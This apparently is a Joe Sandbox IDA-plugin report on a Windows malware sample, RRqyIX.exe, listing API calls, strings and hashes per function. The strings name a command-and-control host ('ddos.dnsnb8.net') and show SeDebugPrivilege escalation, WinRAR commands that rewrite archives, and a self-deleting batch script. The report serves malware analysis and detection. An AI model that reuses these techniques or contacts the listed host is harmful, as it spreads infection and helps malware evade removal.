Instruction ID: d0c4d69c88845e2481cd0b2f6993d9b0ce943976e5bb634b777aea5b5a69b44b
Opcode Fuzzy Hash: 3eb34a63df4f66bc542582a99ab58ade5452c7c198bc1423d8fb9d6068df27d4
Instruction Fuzzy Hash: E331D97294039D7BDF20E7A6DC89FDA776CAF14310F040852F585A7082E6B4DAC58BA0

Function 00AE1638 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 70
stringsynchronizationthreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\,?,00000005,00000000), ref: 00AE164F
GetSystemDirectoryA.KERNEL32(C:\Windows\system32,00000104), ref: 00AE165B
GetModuleFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\RRqyIX.exe,00000104), ref: 00AE166E
CreateThread.KERNEL32(00000000,00000000,00AE1099,00000000,00000000,00000000), ref: 00AE16AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00AE16BD

Part of subcall function 00AE139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE13BC
Part of subcall function 00AE139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AE13DA
Part of subcall function 00AE139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AE1448

lstrcpy.KERNEL32(?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE16E5

Strings

C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE1662, 00AE1667, 00AE16DD
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE1644
Documents and Settings, xrefs: 00AE1696
C:\Windows\system32, xrefs: 00AE1656

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\RRqyIX.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-1868831291
Opcode ID: 8acde555bfc3b8534750bc82d137fdabf21fb1febcbe9af35c316a10e37069b0
Instruction ID: 780cb21829624f6e00962e6189ee4f860cca1e86c8b96ab84bfbf5f04d849007
Opcode Fuzzy Hash: 8acde555bfc3b8534750bc82d137fdabf21fb1febcbe9af35c316a10e37069b0
Instruction Fuzzy Hash: EA11B6725012F4BBDF21A7E79DCDEEB3E6DEB49761F000051F2099A0A0D6708A41CBB1

Function 00AE1000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,76938400,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00AE1038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE1075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00AE10E8,?), ref: 00AE108E

Strings

ddos.dnsnb8.net, xrefs: 00AE1026
http://%s:%d/%s/%s, xrefs: 00AE1000

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 440b7e1e5f7ee05ce8fba7b75d546d64da2c64899a23c922fc789b1f219dcb4d
Instruction ID: b8bc68bff389a1a0792074d3cdce193807fc4ef26d9c59ca5d5831514bb55f65
Opcode Fuzzy Hash: 440b7e1e5f7ee05ce8fba7b75d546d64da2c64899a23c922fc789b1f219dcb4d
Instruction Fuzzy Hash: 4D01487250039DBFE730AFA19CCCE2B7BACDB447A9F004529F645A7590D6705E458B60

Function 00AE2C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00AE2C57

Part of subcall function 00AE1973: PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1992
Part of subcall function 00AE1973: CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
Part of subcall function 00AE1973: Sleep.KERNEL32(00000064), ref: 00AE19C6
Part of subcall function 00AE1973: wsprintfA.USER32 ref: 00AE19EC
Part of subcall function 00AE1973: CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
Part of subcall function 00AE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
Part of subcall function 00AE1973: GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
Part of subcall function 00AE1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
Part of subcall function 00AE1973: ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65

CreateThread.KERNEL32(00000000,00000000,Function_00002B8C,00000000,00000000,00000000), ref: 00AE2C99
WaitForMultipleObjects.KERNEL32(00000001,00AE16BA,00000001,000000FF,?,00AE16BA,00000000), ref: 00AE2CAC
VirtualFree.KERNEL32(00C30000,00000000,00008000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,00AE4E5C,00AE4E60,?,00AE16BA,00000000), ref: 00AE2CC2

Strings

C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE2C69

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe
API String ID: 2042498389-1698010288
Opcode ID: a7c192d79cdbb719f2ce583fbd838037592ba5274dca13c0a7f528fb8e5bb7fe
Instruction ID: aa930a364c904a30a3ce9088dc5f09fde5d70020b2aa5010e8ba6dd559773aab
Opcode Fuzzy Hash: a7c192d79cdbb719f2ce583fbd838037592ba5274dca13c0a7f528fb8e5bb7fe
Instruction Fuzzy Hash: EB017C726412A47AE614EBE6DC4EFEB7EADEF45B60F104520F5059A1C1D6A09A00C7A0

Function 00AE14E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00AE1504
VirtualQuery.KERNEL32(00AE14E1,?,0000001C), ref: 00AE1525
ExitProcess.KERNEL32 ref: 00AE157A

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: 181df8f21ab1c05aaaf385865b9e21d8bfeee2bc93cd4821d1226c6f32fe16f5
Instruction ID: 86239b4bcaa2d20425405ec2dcaffdbe64c82edd67673fef06f44e91526fb627
Opcode Fuzzy Hash: 181df8f21ab1c05aaaf385865b9e21d8bfeee2bc93cd4821d1226c6f32fe16f5
Instruction Fuzzy Hash: 89113CB1E412A4EFCB21DFE6ACC5A7D77BCEB8C751B10402AF403DB150D27489429B61

Function 00AE1915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00AE1933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00AE1947

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: af4146d0dcc7b22bdfc43876e37825728594ed9390a3afd9e8106ccbebbac7ed
Instruction ID: 3b669ee32fc7d7cbc85f43d5e9523e05cf935ca3fea47c8b6f21620f1b0bbe59
Opcode Fuzzy Hash: af4146d0dcc7b22bdfc43876e37825728594ed9390a3afd9e8106ccbebbac7ed
Instruction Fuzzy Hash: 65F06232200259ABDB20DF67DC44BEB77ACAB50361F50853AF526D6091E770E645CBB0

Function 00AE6159 Relevance: 2.6, APIs: 2, Instructions: 58
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00AE60DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00AE6189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00AE61A5

Memory Dump Source

Source File: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: bb24bd534f81e4389fe96f4ee43071a241772b8d06ea67700a2d036d8fe43670
Instruction ID: 122d628f706ab1884ea950d04eb0c7f9988270324b2f2bb83822906723553b0b
Opcode Fuzzy Hash: bb24bd534f81e4389fe96f4ee43071a241772b8d06ea67700a2d036d8fe43670
Instruction Fuzzy Hash: E211BC32A00689CFCF328F59CC813DD37A1FF21340F694928DE896F292DA712940CB94

Non-executed Functions

Function 00AE119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,?,?,00AE13EF), ref: 00AE11AB
OpenProcessToken.ADVAPI32(00000000,00000028,00AE13EF,?,?,?,?,?,?,00AE13EF), ref: 00AE11BB
AdjustTokenPrivileges.ADVAPI32(00AE13EF,00000000,?,00000010,00000000,00000000), ref: 00AE11EB
CloseHandle.KERNEL32(00AE13EF), ref: 00AE11FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AE13EF), ref: 00AE1203

Strings

C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE11A5

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe
API String ID: 75692138-1698010288
Opcode ID: bde308b0d99d67afc4191389d2b4cba85fea5f998209a833a085a05fb0d89ebd
Instruction ID: 9cad48e8aa76240045cb20aea485349551f7b28194bb2fd2b8f066cbffd43ec2
Opcode Fuzzy Hash: bde308b0d99d67afc4191389d2b4cba85fea5f998209a833a085a05fb0d89ebd
Instruction Fuzzy Hash: AA0124B2900248FFDF10EFE4DD89AAEBBB9FB08304F104469E606A6250D7709F459F50

Function 00AE139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE13BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00AE13DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00AE1448

Part of subcall function 00AE119F: GetCurrentProcess.KERNEL32(C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,?,?,00AE13EF), ref: 00AE11AB
Part of subcall function 00AE119F: OpenProcessToken.ADVAPI32(00000000,00000028,00AE13EF,?,?,?,?,?,?,00AE13EF), ref: 00AE11BB
Part of subcall function 00AE119F: AdjustTokenPrivileges.ADVAPI32(00AE13EF,00000000,?,00000010,00000000,00000000), ref: 00AE11EB
Part of subcall function 00AE119F: CloseHandle.KERNEL32(00AE13EF), ref: 00AE11FA
Part of subcall function 00AE119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00AE13EF), ref: 00AE1203

Strings

SeDebugPrivilege, xrefs: 00AE13D3
C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE13A8

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user\AppData\Local\Temp\RRqyIX.exe$SeDebugPrivilege
API String ID: 4123949106-3465637096
Opcode ID: 2390801fe337746c2056dc0be24c8976ef1a5fa312fb252ff2068342db0542cd
Instruction ID: 777525df9108785b0979755bb5c42abe5c000b0e52fc4592d77e7beb6740b0f7
Opcode Fuzzy Hash: 2390801fe337746c2056dc0be24c8976ef1a5fa312fb252ff2068342db0542cd
Instruction Fuzzy Hash: B03183B1E002AAEADF60DBA7CD45FEEBBB8EB44704F104569E505B7281D7309E45CB60

Function 00AE239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00AE23CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE2464
GetFileSize.KERNEL32(00000000,00000000), ref: 00AE2472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00AE24A8
memset.MSVCRT ref: 00AE24B9
strrchr.MSVCRT ref: 00AE24C9
wsprintfA.USER32 ref: 00AE24DE
strrchr.MSVCRT ref: 00AE24ED
memset.MSVCRT ref: 00AE24F2
memset.MSVCRT ref: 00AE2505
wsprintfA.USER32 ref: 00AE2524
Sleep.KERNEL32(000007D0), ref: 00AE2535
Sleep.KERNEL32(000007D0), ref: 00AE255D
memset.MSVCRT ref: 00AE256E
wsprintfA.USER32 ref: 00AE2585
memset.MSVCRT ref: 00AE25A6
wsprintfA.USER32 ref: 00AE25CA
Sleep.KERNEL32(000007D0), ref: 00AE25D0
Sleep.KERNEL32(000007D0,?,?), ref: 00AE25E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00AE25FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00AE2611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00AE2642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00AE265B
SetEndOfFile.KERNEL32 ref: 00AE266D
CloseHandle.KERNEL32(00000000), ref: 00AE2676
RemoveDirectoryA.KERNEL32(?), ref: 00AE2681

Strings

%s\, xrefs: 00AE257F
%s X -ibck "%s" "%s\", xrefs: 00AE251E
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE23B1, 00AE23B6, 00AE24CD
-ibck, xrefs: 00AE25BA
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00AE25C4
%s%s, xrefs: 00AE24D8

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user\AppData\Local\Temp\
API String ID: 2203340711-774930870
Opcode ID: 6880a7e863da7c18298e83242900259c6d3eba6fc570be3d5ce9fef2f0adb11d
Instruction ID: a230f92bcc40d0dc82da44ce9fd80a35ce863a0ec084d34707058f349f054369
Opcode Fuzzy Hash: 6880a7e863da7c18298e83242900259c6d3eba6fc570be3d5ce9fef2f0adb11d
Instruction Fuzzy Hash: 8581A1B2504384BBDB10DFA2DC89FAB77EDFB88704F00091AF684D7190D7749A498B66

Function 00AE274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00AE2766
memset.MSVCRT ref: 00AE2774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00AE2787
wsprintfA.USER32 ref: 00AE27AB

Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894

wsprintfA.USER32 ref: 00AE27C6
CopyFileA.KERNEL32(?,00AE4C80,00000000), ref: 00AE27D4
wsprintfA.USER32 ref: 00AE27F4

Part of subcall function 00AE1973: PathFileExistsA.SHLWAPI(00AE4E5C,00000000,C:\Users\user\AppData\Local\Temp\RRqyIX.exe), ref: 00AE1992
Part of subcall function 00AE1973: CreateFileA.KERNEL32(00AE4E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00AE19BA
Part of subcall function 00AE1973: Sleep.KERNEL32(00000064), ref: 00AE19C6
Part of subcall function 00AE1973: wsprintfA.USER32 ref: 00AE19EC
Part of subcall function 00AE1973: CopyFileA.KERNEL32(00AE4E5C,?,00000000), ref: 00AE1A00
Part of subcall function 00AE1973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00AE1A1E
Part of subcall function 00AE1973: GetFileSize.KERNEL32(00AE4E5C,00000000), ref: 00AE1A2C
Part of subcall function 00AE1973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00AE1A46
Part of subcall function 00AE1973: ReadFile.KERNEL32(00AE4E5C,00AE4E60,00000000,?,00000000), ref: 00AE1A65

DeleteFileA.KERNEL32(?,?,00AE4E54,00AE4E58), ref: 00AE281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00AE4E54,00AE4E58), ref: 00AE2832

Strings

%s%.8x.exe, xrefs: 00AE27BB
%s\%s, xrefs: 00AE27EE
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE27B6
\WinRAR\Rar.exe, xrefs: 00AE2793
C:\Windows\system32, xrefs: 00AE27E3
c_31892.nls, xrefs: 00AE27DE
%s%s, xrefs: 00AE27A5

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-3099098879
Opcode ID: b7e72d4efab014c61f526f188b795d815b67572f03a3644eab07b205e91aa6f5
Instruction ID: 378f244a465c10ae2645185910d9e3c418814047f3a918a4f735558ca65c7e78
Opcode Fuzzy Hash: b7e72d4efab014c61f526f188b795d815b67572f03a3644eab07b205e91aa6f5
Instruction Fuzzy Hash: A621FCB7D402987BEB10E7A69D89FEB776CEB14754F0009A1B645E3042E6B49F448BA0

Function 00AE1581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AE185B: GetSystemTimeAsFileTime.KERNEL32(00AE1F92,00000000,?,00000000,?,?,?,00AE1F92,?,00000000,00000002), ref: 00AE1867
Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1878
Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1880
Part of subcall function 00AE185B: srand.MSVCRT ref: 00AE1890
Part of subcall function 00AE185B: rand.MSVCRT ref: 00AE1894

wsprintfA.USER32 ref: 00AE15AA
wsprintfA.USER32 ref: 00AE15C6
lstrlen.KERNEL32(?), ref: 00AE15D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00AE15EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00AE1609
CloseHandle.KERNEL32(00000000), ref: 00AE1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00AE162D

Strings

:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00AE15C0
C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE158A, 00AE15B3, 00AE15B8, 00AE15B9
C:\Users\user\AppData\Local\Temp\, xrefs: 00AE1599
%s%.8x.bat, xrefs: 00AE15A4
open, xrefs: 00AE1627

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_ae0000_RRqyIX.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\RRqyIX.exe$open
API String ID: 617340118-1889264406
Opcode ID: acc9b14e7d6fffe9dcde48ca9486975253c47c753164d91ea8aedb33f78fc3e4
Instruction ID: 58a6aa67b9bc404a7858cc5f0b692379ab5408d97af4875a4788d887ecabfe87
Opcode Fuzzy Hash: acc9b14e7d6fffe9dcde48ca9486975253c47c753164d91ea8aedb33f78fc3e4
Instruction Fuzzy Hash: 7E115173A011A8BADF20D7E59C8DDEB7B6CEF59760F000591F549E3040DA709B858BB0

Function 00AE120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00AE1400), ref: 00AE1226
GetProcAddress.KERNEL32(00000000), ref: 00AE122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00AE1400), ref: 00AE123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00AE1400), ref: 00AE1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,00AE1400), ref: 00AE129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,00AE1400), ref: 00AE12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\RRqyIX.exe,?,?,?,?,00AE1400), ref: 00AE12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00AE1400), ref: 00AE130A

Strings

C:\Users\user\AppData\Local\Temp\RRqyIX.exe, xrefs: 00AE1262
ntdll.dll, xrefs: 00AE1219
ZwQuerySystemInformation, xrefs: 00AE1212

Memory Dump Source

Source File: 00000001.00000002.2245576704.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true

Associated: 00000001.00000002.2245553805.0000000000AE0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245596654.0000000000AE3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245614022.0000000000AE4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.2245632934.0000000000AE6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

